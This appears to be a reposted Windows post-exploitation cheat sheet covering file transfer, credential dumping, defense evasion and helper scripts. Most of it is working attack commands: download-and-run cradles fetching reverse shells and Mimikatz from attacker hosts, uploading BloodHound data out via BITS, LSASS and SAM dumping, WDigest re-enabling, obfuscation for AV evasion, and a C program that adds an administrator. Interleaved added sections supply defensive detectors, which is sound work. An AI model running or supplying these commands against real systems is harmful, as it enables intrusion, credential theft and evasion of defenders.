echo <base64> | base64 -d -w 0 > bloodhound.zip

## ------------------| Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
  • Download files
## ------------------| Old versions (works on any version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.63/nc.exe', 'C:\Users\Public\nc.exe')"

## ------------------| Newer versions (alias IWR)
powershell -c "Invoke-WebRequest http://10.10.14.26/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Execute in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/revshell.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/revshell.ps1 | iex"

## ------------------| Internet Explorer first-run error (-UseBasicParsing)
powershell -c "IWR -UseBasicParsing http://10.10.14.26/nc.exe -o C:\Users\Public\nc.exe"
### If you have administrator access you can disable Internet Explorer's first-run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f http://10.10.14.26/nc.exe C:\Users\Public\nc.exe

## ------------------| Using Curl
powershell curl http://10.10.14.11/rev.ps1

## ------------------| Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"
  • Execute files
## ------------------| Remote
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/SharpHound.ps1')

## ------------------| Local
.\rev.ps1
Import-Module .\rev.ps1

01.11 Encode/Decode

  • Encode a payload
## ------------------| Encode the payload 
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

## ------------------| Run the payload
powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==
  • Encode a file as base64
## ------------------| Method I
powershell -c [convert]::ToBase64String((cat C:\windows\system32\license.rtf -Encoding byte))

## ------------------| Method II
certutil -encode C:\windows\system32\license.rtf license-b64.out

## ------------------| Method III
$fc = Get-Content "file name.txt" -Raw   # -Raw keeps the file as one string instead of an array of lines
$fc
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)
  • Decrypt a secure password (SecureString)
## ------------------| From SecureString.xml
$file = Import-CliXml -Path string.xml
$file.GetNetworkCredential().Password
$file.GetNetworkCredential().Flag

## ------------------|
$pw = gc admin-pass.xml | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential("Administrator", $pw)
$cred.GetNetworkCredential() | fl *

## ------------------|
$user = "USERNAME"
$pass = "PASSWORD"
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$secStringPass)
$cred | fl
$cred.GetNetworkCredential() | fl

01.12 Dump Credentials

  • Dump the SAM and SYSTEM hives
REG SAVE HKLM\SYSTEM SYSTEM
REG SAVE HKLM\SAM SAM

# Get hashes
impacket-secretsdump -sam SAM -system SYSTEM local

impacket-secretsdump -sam SAM -system SYSTEM -history local

## ------------------| Out-Minidump (PowerSploit)
wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1
IEX(New-Object Net.Webclient).DownloadString('http://<IP>/Out-Minidump.ps1')
Get-Process lsass | out-minidump

## ------------------| Get PID
tasklist | findstr /i lsas

## ------------------| Dump to file
procdump64.exe -accepteula -ma <PID> lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

## ------------------| Extract hashes
pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords"

## ------------------| Dumpert
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.dll
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.exe

.\Outflank-Dumpert.exe
rundll32.exe C:\Windows\temp\Outflank-Dumpert.dll,Dump

## ------------------| AvDump location
C:\Program Files\Avast Software\Avast\AvDump.exe

## ------------------| Download
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x86/AvDump.exe
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x64/AvDump.exe

## ------------------| Execute
.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Windows\temp\file.dmp

## ------------------| Metasploit post exploitation module
post/windows/gather/avast_memory_dump

## ------------------| Download SqlDumper
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x86.zip
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x64.zip

## ------------------| Execute
.\sqldumper.exe [lsass's pid] 0 0x0110

## ------------------| Extract passwords
mimikatz.exe "log" "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
  • LaZagne.exe [Firefox, Chrome]
wget https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe
.\laZagne.exe all
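The credential-dumping commands in this section are noisy on the command line, which makes them a good starting point for detection. The following is an added example, not part of the original page: a small matcher that checks process command lines (for example the CommandLine field of Security event 4688 with command-line auditing enabled, or Sysmon event 1) against the patterns used on this page, run over constructed sample lines. The pattern names, the function name and the samples are my own.

```powershell
# Added example, not from the original cheat sheet.
# Flags process command lines that match the credential-dumping and Defender-tampering
# commands shown in this section. -match is case-insensitive, so mixed-case variants hit too.
$DumpPatterns = [ordered]@{
    'comsvcs MiniDump'      = 'comsvcs\.dll\s*,\s*MiniDump'
    # numeric PIDs should be correlated with the real lsass PID before alerting
    'procdump of lsass/PID' = 'procdump(64)?(\.exe)?\s.*-ma\s+(lsass|\d+)'
    'SAM/SYSTEM hive save'  = 'reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b'
    'mimikatz sekurlsa'     = 'sekurlsa::'
    'Out-Minidump on lsass' = 'get-process\s+lsass\s*\|\s*out-minidump'
    'Defender weakened'     = 'set-mppreference\s+-disable\w+|add-mppreference\s+-exclusion'
    'WDigest plaintext'     = 'wdigest\\?.*uselogoncredential'
}

function Test-CredentialDumpCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = foreach ($name in $DumpPatterns.Keys) {
        if ($CommandLine -match $DumpPatterns[$name]) { $name }
    }
    [pscustomobject]@{
        Suspicious  = (@($hits).Count -gt 0)
        Hits        = @($hits)
        CommandLine = $CommandLine
    }
}

# Constructed samples: the first five mirror commands from this page, the last two are benign.
$samples = @(
    'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\Documents\lsass.dmp full',
    'procdump64.exe -accepteula -ma lsass.exe lsass.dmp',
    'reg.exe save HKLM\SAM C:\Users\Public\SAM',
    'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
    'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1',
    'reg.exe query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion',
    'procdump64.exe -accepteula -ma myapp.exe crash.dmp'
)
$samples | ForEach-Object { Test-CredentialDumpCommandLine -CommandLine $_ } | Format-Table Suspicious, Hits, CommandLine -AutoSize
```

In production the same function can be fed from Get-WinEvent over the Security log (event 4688) or the Sysmon operational log (event 1) instead of the constructed array.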

01.13 Other

  • Copy files from an SMB server
## ------------------| Start SMB Server
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123

## ------------------| Mount the share with cmd
net use z: \\<MyIP>\share
net use z: \\<MyIP>\share /USER:h4rithd Password123

## ------------------| Mount the share with PowerShell
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir

## ------------------| Direct copy
copy C:\Users\Public\sam \\10.10.14.26\share\sam
xcopy C:\Users\Public\sam \\10.10.14.26\share\sam
  • Start an SMB (Samba) server on Linux to share files
## ------------------| Using impacket-smbserver
impacket-smbserver share .
# If you get the error "Your system requires SMB2 or higher", run this instead
impacket-smbserver share . -smb2support

## ------------------| Using the Linux default Samba daemon
## Back up the current settings
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
## Create the directory for the share and grant permissions
mkdir -p /tmp/smb
chmod 0777 /tmp/smb
## Configure Samba for the share (appended with a heredoc: bash's echo does not
## expand \n without -e, and writing to /etc/samba needs root)
sudo tee -a /etc/samba/smb.conf > /dev/null <<EOF

#### --- $(hostname) edited the lines below ----
[share]
   path = /tmp/smb
   public = yes
   writable = yes
   comment = $(hostname) shares
   printable = no
   guest ok = yes
#### --- Edit done -------
EOF
## Verify the config (testparm also reports syntax errors)
tail -n 10 /etc/samba/smb.conf
testparm -s
## Start the smb service
sudo service smbd restart

## ** Note: restore the original settings when you are done!!!
sudo cp /etc/samba/smb.conf.bak /etc/samba/smb.conf
sudo service smbd restart
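The [share] section above is an anonymous, writable share, which is exactly what you do not want left behind on a real server. Added example (my own, not from the original notes or any Samba tool): a small Python audit that parses an smb.conf fragment, flags shares that allow guest access and guests writing, and passes a hardened counterpart. The smb.conf text is constructed; the section and option names are standard Samba ones, and the "secure" share is an assumption for illustration.

```python
"""Audit Samba share definitions for the weak settings used by the temporary
share above (guest access on a writable share). Added example for defenders;
not part of the original notes. The smb.conf text is constructed."""

# Constructed smb.conf: the ad-hoc share from the notes next to a hardened one.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP

#### --- lab share, as appended by the notes ----
[share]
   path = /tmp/smb
   public = yes
   writable = yes
   comment = lab shares
   printable = no
   guest ok = yes

# Hardened counterpart: no guest access, read-only, limited to one group
[secure]
   path = /srv/secure
   guest ok = no
   read only = yes
   valid users = @staff
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}}, section and key names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank or comment line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def is_true(opts, key):
    return opts.get(key, "no").lower() in TRUE_VALUES


def allows_guests(opts):
    # 'public' is a Samba synonym for 'guest ok'
    return is_true(opts, "guest ok") or is_true(opts, "public")


def is_writable(opts):
    # 'writable', 'writeable' and 'write ok' are all the inverse of 'read only';
    # Samba defaults to read only = yes when none of them is set.
    for key in ("writable", "writeable", "write ok"):
        if key in opts:
            return is_true(opts, key)
    return "read only" in opts and not is_true(opts, "read only")


def audit_smb_conf(text):
    """Return {share: [issues]} for every share that exposes data to anonymous users."""
    findings = {}
    for name, opts in parse_smb_conf(text).items():
        if name in ("global", "printers", "print$"):
            continue
        issues = []
        if allows_guests(opts):
            issues.append("guest access enabled")
            if is_writable(opts):
                issues.append("guests can write")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    print(audit_smb_conf(SAMPLE_SMB_CONF))
```

Run it against a real /etc/samba/smb.conf by reading the file into audit_smb_conf(); anything it reports after a lab session is a share that should have been removed with the backup restore step above.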
## ------------------| Run a PowerShell prompt as another user without loading that user's profile [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

## ------------------| Add the registry value that re-enables WDigest on newer versions of Windows
## (key path is Control, not Contro; defenders should alert on writes to this value, which should be 0 or absent)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

## ------------------| Invoke BypassUAC and start a PowerShell prompt as administrator [or replace the command to run anything else]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

## ------------------| Invoke-Mimikatz: dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

## ------------------| Import the Mimikatz module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

## ------------------| Invoke-MassMimikatz: dump credentials on remote hosts [replace $env:COMPUTERNAME with the target server name]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

## ------------------| PowerUp: privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

## ------------------| Invoke Inveigh and log the output to files
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

## ------------------| Invoke Kerberoast and output Hashcat-compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

## ------------------| Invoke ShareFinder and write the output to a file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## ------------------| Import the PowerView module to run more commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## ------------------| Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

02. Defense Evasion Techniques

  • AV evasion techniques (Invoke-Obfuscation)
## ------------------| Basic setup
git clone https://github.com/danielbohannon/Invoke-Obfuscation
cd Invoke-Obfuscation
pwsh
Import-Module ./Invoke-Obfuscation.psd1
cd /tmp
Invoke-Obfuscation

## ------------------| Obfuscate the whole command via encoding
SET SCRIPTPATH /tmp/revshell.ps1
ENCODING
5
OUT /tmp/enc.ps1

## ------------------| Obfuscate PowerShell AST nodes (PS3.0+)
SET SCRIPTPATH /tmp/revshell.ps1
AST
ALL
1
OUT /tmp/enc.ps1
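Every one-liner in the PowerShell block above follows the same shape (policy bypass, a download cradle, a well-known tool name), and Invoke-Obfuscation's encoding and tick-insertion options are what hides that shape from simple string matching. Added example (my own, not from the original notes or either project): a Python scanner for script block text such as Event ID 4104 records or 4688 command lines that normalises inserted backticks, decodes a -EncodedCommand payload and rescans it, and reports which indicators matched. The indicator names, thresholds and all sample script blocks are constructed for this example.

```python
"""Flag PowerShell script blocks (Event ID 4104 text, process command lines)
that match the download-cradle, policy-bypass and obfuscation patterns shown
in this section. Added example for defenders; not part of the original notes.
All sample script blocks below are constructed."""
import base64
import re

# Each indicator is matched against the normalised text. Names are constructed.
INDICATORS = [
    ("download_cradle",
     re.compile(r"(?is)(?:\biex\b|invoke-expression).*?(?:downloadstring|downloadfile|downloaddata)")),
    ("policy_bypass", re.compile(r"(?i)-(?:ep|ex|exec|executionpolicy)\s+bypass")),
    ("credential_tooling",
     re.compile(r"(?i)invoke-(?:mass)?mimikatz|sekurlsa::|invoke-kerberoast|invoke-bloodhound")),
    ("raw_github_fetch", re.compile(r"(?i)raw\.githubusercontent\.com")),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# A backtick between two letters is never needed in PowerShell; it is the
# cheapest Invoke-Obfuscation trick (I`EX, Ne`w-Ob`ject).
TICK_IN_WORD = re.compile(r"(?<=[A-Za-z])`(?=[A-Za-z])")


def normalize(text):
    """Undo in-token backtick insertion so the indicators match again."""
    return TICK_IN_WORD.sub("", text)


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(text, _depth=0):
    """Return the list of indicator names that fire for one script block.
    Findings from a decoded -EncodedCommand payload are prefixed 'encoded:'."""
    findings = []
    if len(TICK_IN_WORD.findall(text)) >= 3:
        findings.append("backtick_obfuscation")
    clean = normalize(text)
    for name, pattern in INDICATORS:
        if pattern.search(clean):
            findings.append(name)
    decoded = decode_encoded_command(clean) if _depth == 0 else None
    if decoded is not None:
        findings.append("encoded_command")
        findings.extend("encoded:" + f for f in scan_script_block(decoded, _depth + 1))
    return findings


def _encode(command):
    """Build an -EncodedCommand value the way powershell.exe expects it (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed samples; 203.0.113.0/24 is the RFC 5737 documentation range.
SAMPLES = {
    "cradle": "powershell.exe -exec bypass -C \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.5/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\"",
    "encoded": "powershell.exe -NoP -enc "
               + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"),
    "ticked": "I`EX (Ne`w-Ob`ject Net.Web`Client).Download`String('http://203.0.113.5/x.ps1')",
    "benign": "Get-ChildItem Env: | Format-Table Key,Value",
}

if __name__ == "__main__":
    for label, block in SAMPLES.items():
        print(f"{label:8s} -> {scan_script_block(block)}")
```

The scanner is deliberately one level deep: a payload that itself carries another -EncodedCommand is worth an alert on its own, so there is no need to recurse further. Pair it with the Windows-side control that actually produces 4104 text, Script Block Logging, because a process command line only shows the outer layer.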
  • Evasion using Shellter
shellter
A ### For automatic mode
### or choose manual mode and do it yourself.

03. Scripts

  • Add a new user using C
#include <stdlib.h>

int main(void)
{
    int rc;
    /* Create the local user, then add it to the Administrators group;
       stop if the first net command fails. */
    rc = system("net user h4rithd Password! /add");
    if (rc != 0)
        return rc;
    rc = system("net localgroup administrators h4rithd /add");
    return rc;
}

## Cross-compile on Linux (no root needed): i686-w64-mingw32-gcc adduser.c -o adduser.exe
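On the target, the program above produces two Security events a few seconds apart: 4720 (user account created) and 4732 (member added to a security-enabled local group). Added example (my own, not from the original notes): a Python correlation that finds accounts created and then placed in a privileged local group within a short window. The events are constructed and simplified; real 4732 records identify the member by SID, which you would resolve before matching on name, and the privileged-group list and field names are assumptions of this example.

```python
"""Correlate Windows Security events to catch the pattern produced by the
adduser program above: a local account created (4720) and then added to a
privileged group (4732) moments later. Added example for defenders; not part
of the original notes. Events are constructed and simplified."""
from datetime import datetime

# Constructed, simplified events. Real records carry many more fields.
SAMPLE_EVENTS = [
    {"time": "2024-06-02T10:00:00", "id": 4720, "subject": "LAB\\svc-build", "target": "h4rithd"},
    {"time": "2024-06-02T10:00:01", "id": 4732, "subject": "LAB\\svc-build",
     "member": "h4rithd", "group": "Administrators"},
    {"time": "2024-06-02T11:00:00", "id": 4720, "subject": "LAB\\helpdesk", "target": "jdoe"},
    {"time": "2024-06-02T11:00:02", "id": 4732, "subject": "LAB\\helpdesk",
     "member": "jdoe", "group": "Remote Desktop Users"},
    # same account added to Administrators again hours later, by someone else
    {"time": "2024-06-02T12:30:00", "id": 4732, "subject": "LAB\\admin",
     "member": "h4rithd", "group": "Administrators"},
]

# Local groups whose membership grants broad control; an assumption for the example.
PRIVILEGED_GROUPS = {"administrators", "remote management users", "backup operators"}


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_new_privileged_accounts(events, window_s=300):
    """Return (account, created_by, group, seconds_between) for each account
    that was created and then added to a privileged group within window_s."""
    created = {}   # account name (lower-cased) -> (creation time, creator)
    hits = []
    for ev in sorted(events, key=_ts):
        if ev["id"] == 4720:
            created[ev["target"].lower()] = (_ts(ev), ev["subject"])
        elif ev["id"] == 4732 and ev["group"].lower() in PRIVILEGED_GROUPS:
            record = created.get(ev["member"].lower())
            if record is None:
                continue            # pre-existing account; out of scope here
            delta = (_ts(ev) - record[0]).total_seconds()
            if 0 <= delta <= window_s:
                hits.append((ev["member"], record[1], ev["group"], int(delta)))
    return hits


if __name__ == "__main__":
    for account, creator, group, seconds in find_new_privileged_accounts(SAMPLE_EVENTS):
        print(f"{account} created by {creator} and added to {group} after {seconds}s")
```

The window matters more than the group list: legitimate provisioning tools also create an account and add it to a group, but they do it through a known service account, so the creator field is what you whitelist, not the pattern.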
  • Get-ServiceACL.ps1
# download Get-ServiceACL.ps1 to the box and execute in memory
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.2/GetServiceACL.ps1',$false);$h.send();iex $h.responseText

# examine nscp service ACL
"nscp" | Get-ServiceAcl | select -ExpandProperty Access
  • Invoke-TSPingSweep.ps1
wget https://raw.githubusercontent.com/dwj7738/My-Powershell-Repository/master/Scripts/Invoke-TSPingSweep.ps1

IEX(New-Object Net.WebClient).downloadString('http://10.8.0.74/Invoke-TSPingSweep.ps1')
Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
  • Invoke-Portscan
## ------------------| Scan port 22
Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" }

## ------------------| Scan other ports
Invoke-Portscan -Hosts 172.16.249.202 -Ports '21,22,80,443,8080'
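A ping sweep or port scan like the two above leaves an unmistakable shape in connection logs: one source reaching many hosts, or many ports on one host, within a short window. Added example (my own, not from the original notes or PowerSploit): a Python detector that slides a time window over per-source connection records and reports peak distinct-host and distinct-port counts. The key=value log format, the thresholds and all log lines are constructed; adapt parse_line() to your firewall or NetFlow export.

```python
"""Spot the traffic pattern a ping sweep or port scan (Invoke-TSPingSweep /
Invoke-Portscan above) leaves in connection logs. Added example for
defenders; not part of the original notes. Log lines are constructed in a
simple key=value form; adapt parse_line() to your own firewall/NetFlow format."""
from collections import defaultdict
from datetime import datetime
import re

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for lines that do not match."""
    m = LINE.match(line)
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def detect_sweeps(lines, window_s=60, host_threshold=10, port_threshold=5):
    """Return (src, kind, peak) findings. kind is 'host_sweep' when one source
    reaches >= host_threshold distinct hosts within window_s seconds, and
    'port_scan' when it reaches >= port_threshold distinct ports on one host."""
    events = sorted(e for e in map(parse_line, lines) if e)
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    findings = []
    for src, evs in by_src.items():
        peak_hosts = peak_ports = 0
        # events are time-ordered, so each start index defines one window
        for i, (t0, _, _, _) in enumerate(evs):
            hosts, ports_per_dst = set(), defaultdict(set)
            for t, _, dst, port in evs[i:]:
                if (t - t0).total_seconds() > window_s:
                    break
                hosts.add(dst)
                ports_per_dst[dst].add(port)
            peak_hosts = max(peak_hosts, len(hosts))
            peak_ports = max(peak_ports, max(len(p) for p in ports_per_dst.values()))
        if peak_hosts >= host_threshold:
            findings.append((src, "host_sweep", peak_hosts))
        if peak_ports >= port_threshold:
            findings.append((src, "port_scan", peak_ports))
    return findings


# Constructed log: a 12-host sweep on port 22, a 6-port scan of one host,
# ordinary repeat traffic from a third client, and one unparseable line.
SAMPLE_LOG = (
    [f"2024-06-02T10:00:{i:02d} src=192.168.0.50 dst=192.168.0.{i + 1} dport=22 proto=tcp"
     for i in range(12)]
    + [f"2024-06-02T10:05:{i:02d} src=192.168.0.51 dst=192.168.0.200 dport={p} proto=tcp"
       for i, p in enumerate([21, 22, 80, 443, 8080, 3389])]
    + [f"2024-06-02T10:{m:02d}:00 src=192.168.0.52 dst=192.168.0.1 dport=443 proto=tcp"
       for m in (10, 11, 12)]
    + ["malformed line that parse_line() skips"]
)

if __name__ == "__main__":
    for src, kind, peak in detect_sweeps(SAMPLE_LOG):
        print(f"{src}: {kind} (peak {peak} in 60s)")
```

The per-window loop is quadratic in the number of events from one source, which is fine for a batch run over a day of logs; for a streaming pipeline keep one deque per source and evict entries older than the window instead.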
  • Invoke-AESEncryption.ps1
## ------------------| Import-Module
Import-Module .\Invoke-AESEncryption.ps1

## ------------------| Encrypt
Invoke-AESEncryption -Mode Encrypt -Key "h4rithd" -Path .\PlainText.txt

## ------------------| Decrypt
Invoke-AESEncryption -Mode Decrypt -Key "h4rithd" -Path .\ciphertext.txt.aes
  • wget.js and wget.vbs (WSH downloaders)
## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://10.10.14.25/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://10.10.14.25/nc.exe nc.exe

Source: https://sh1yan.top/2024/06/02/Windows-Common-Command-Horizontal-Move-h4rithd-20240403/
Author: shiyan
Published: June 2, 2024